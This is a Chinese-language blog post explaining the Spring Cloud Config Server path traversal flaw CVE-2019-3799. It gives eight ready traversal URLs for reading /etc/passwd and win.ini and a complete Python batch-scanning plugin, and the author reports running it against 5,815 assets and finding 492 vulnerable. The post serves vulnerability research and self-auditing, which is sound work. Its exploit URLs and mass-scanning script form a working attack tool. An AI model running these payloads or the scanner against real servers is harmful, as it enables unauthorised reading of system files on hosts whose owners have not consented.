编写Spring Cloud Config Server路径穿越漏洞全面检测脚本

Spring Cloud Config Server路径穿越漏洞(CVE-2019-3799)的分析文章已经很多了,这里我不在画蛇填足。在分析该漏洞之后,发现了一些小细节,感觉对该漏洞检测还是挺有帮助的。基于发现的这些细节,我们来构造适应各种场景,甚至各种奇葩场景的批量检测脚本!

0x01 简洁原理

Spring cloud config 分客户端和服务端。服务端供客户端查询配置,本次漏洞就是出在服务端。

当客户端提交的访问配置请求,会在服务端被解析为以下2种:

配置文件保存在服务端系统临时文件{system_tmp_path}下。在需要获取目标配置文件绝对路径时,服务端会将客户端提供的相对路径{path}和系统临时文件目录{system_tmp_path}进行拼接。

1
config_file_path = {system_tmp_path} + {path}

由于{path}客户端可控且未过滤../,从而导致目录穿越,可读服务端机器上任意文件!

0x02 漏洞检测点

经过分析代码,可以发现,其实该漏洞有三个检查点。不过网上大多数文章提供的漏洞url只是第一处。

第一第二处

第三处

我们先看看第一处@RequestMapping

1
@RequestMapping("/{name}/{profile}/{label}/**")

这里name为应仓库名称,profile为应配置文件环境label为git分支名。实际测试中需要label为存在的分支名(一般git仓库都存在master分支),否则报错,nameprofile可以为任意。由此我们可以构造如下url,即可匹配到该@RequestMapping

1
http://xxx:8888/aaa/bbb/master/{payload}

我们接着来看第二处@RequestMapping

1
@RequestMapping(value = "/{name}/{profile}/**", params = "useDefaultLabel")

根据Spring的RequestMapping匹配规则我们很容易构造以下url

1
http://xxx.com:8888/aaa/bbb/{payload}?useDefaultLabel=1

实际上我们构造的url虽然会被该@RequestMapping匹配到,但并不会执行该注解处代码。而是执行了以下注解处代码。

1
2
3
4
5
//org/springframework/cloud/config/server/environment/EnvironmentController.java
@RequestMapping("/{name}/{profiles}/{label:.*}")
public Environment labelled(...) {
...
}

这是因为我们构造的url,都符合两处注解的匹配规则,但后者匹配度更好优先级更高(*优先级大于**),自然优先被框架用于处理请求了。

因此我们可以构造以下链接,让第一个注解匹配度最高,使得程序使用存在漏洞的方法来处理。

1
http://xxx.com:8888/aaa/bbb/ccc/{payload}?useDefaultLabel=1

第三处,和第一处构造的url一样的,需要在数据包Accept头加入application/octet-stream即可触发!

0x03 目标操作系统

在黑盒渗透测试时,无法确定目标系统是Windows还是Linux,故最稳妥的方法是构造适合两者的payload,都检测一篇。

  • Linux下读/etc/passwd,检查关键字为root:
  • Window下读c:/Windows/win.ini,检查关键字为[extensions]

注意: 在Windows下该漏洞无法跨盘符读文件,也就是只能读和系统临时文件夹同盘符的任意路径下任意文件。 所以在Windwos系统下,系统临时文件路径被修改(这种情况比较少),即使目标存在漏洞,我们的payload也无法检测的,目前暂时没有好的解决方案。

0x04 ..%25F的个数

..%252F../的两次URL编码后结果,它是路径穿越的关键,其个数取决于系统临时文件目录的深度。

3.1 默认情况

这里的默认情况是指,服务端系统临时目录采用的是默认路径。

1
2
3
4
5
6
7
8
Windows系统临时文件存储路径:
file:/C:/Users/ADMINI~1/AppData/Local/Temp/
Windows下Spring cloud config server存储配置路径:
file:/C:/Users/ADMINI~1/AppData/Local/Temp/config-repo-<randomid>/
Linux系统临时文件存储路径:
/tmp/
Linux下Spring cloud config server存储配置路径:
/tmp/config-repo-<randomid>/

所以要吃掉所有配置路径,Windwos下第一处漏洞检测需要6个..%252F,第二处需要7个,第三处需要6个。Linux下第一处2个,第二处需要3个,第三处需要6个。

3.2 极端情况

这里的极端情况是指,服务端系统临时目录被管理员自定义为其他路径,路径深度未知。这时我们可以估计一个最大深度50(相信不会有管理员奇葩到设置更深的目录了)

综合以上各个方面的分析,我们就可以构造出如下8个POC来检查,以应对各种情况该漏洞的检测。

1
2
3
4
5
6
7
8
http://xxx:8888/a/b/master/ + {..%252F}*2 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*6 + Windows%252Fwin.ini
http://xxx:8888/a/b/master/ + {..%252F}*50 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*50 + Windows%252Fwin.ini
http://xxx:8888/a/b/c/ + {..%252F}*3 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*7 + Windows%252Fwin.ini?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + Windows%252Fwin.ini?useDefaultLabel=a

0x05 批量检测脚本

下面附上我写的POC-T插件,这里说明下本脚本仅供自查和学习使用,请勿用于非法用途,否则后果自负。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#coding=utf-8
'''
Autor: c0ny1
Date: 2019-04-20 16:41
Description: Directory Traversal with spring-cloud-config-server(CVE-2019-3799)
Affected Pivotal Products and Versions:
Spring Cloud Config 2.1.0 to 2.1.1
Spring Cloud Config 2.0.0 to 2.0.3
Spring Cloud Config 1.4.0 to 1.4.5
Older unsupported versions are also affected
'''
import requests
from requests import ConnectionError
WIN_CHECK_KEYWORD = '[extensions]'
LINUX_CHECK_KEYWORD = 'root:'
def init_poc():
pocs = []
payload = '/a/b/master/' + '..%252F'*2 + 'etc%252Fpasswd'
poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
pocs.append(poc)
payload = '/a/b/master/' + '..%252F'*6 + 'Windows%252Fwin.ini'
poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
pocs.append(poc)
payload = '/a/b/master/' + '..%252F'*50 + 'etc%252Fpasswd'
poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
pocs.append(poc)
payload = '/a/b/master/' + '..%252F'*50 + 'Windows%252Fwin.ini'
poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
pocs.append(poc)
payload = '/a/b/c/' + '..%252F'*3 + 'etc%252Fpasswd?useDefaultLabel=a'
poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
pocs.append(poc)
payload = '/a/b/c/' + '..%252F'*7 + 'Windows%252Fwin.ini?useDefaultLabel=a'
poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
pocs.append(poc)
payload = '/a/b/c/' + '..%252F'*50 + 'etc%252Fpasswd?useDefaultLabel=a'
poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
pocs.append(poc)
payload = '/a/b/c/' + '..%252F'*50 + 'Windows%252Fwin.ini?useDefaultLabel=a'
poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
pocs.append(poc)
return pocs
pocs = init_poc()
def poc(url):
for p in pocs:
url = url if not url.endswith('/') else url[0:len(url)-1] #去掉结尾/
target_url = url + p.get('payload')
try:
r = requests.get(target_url,timeout=10)
except Exception,e:
continue
if (r.status_code == 200) and (p.get('keyword') in r.content):
return True
return False

去参加Avicii的纪念活动之前就挂着扫描,回来发现成果还不错。扫描5815个资产,存在漏洞的有492。最后希望管理员们及时修复吧!

扫描成果

0x06 参考文章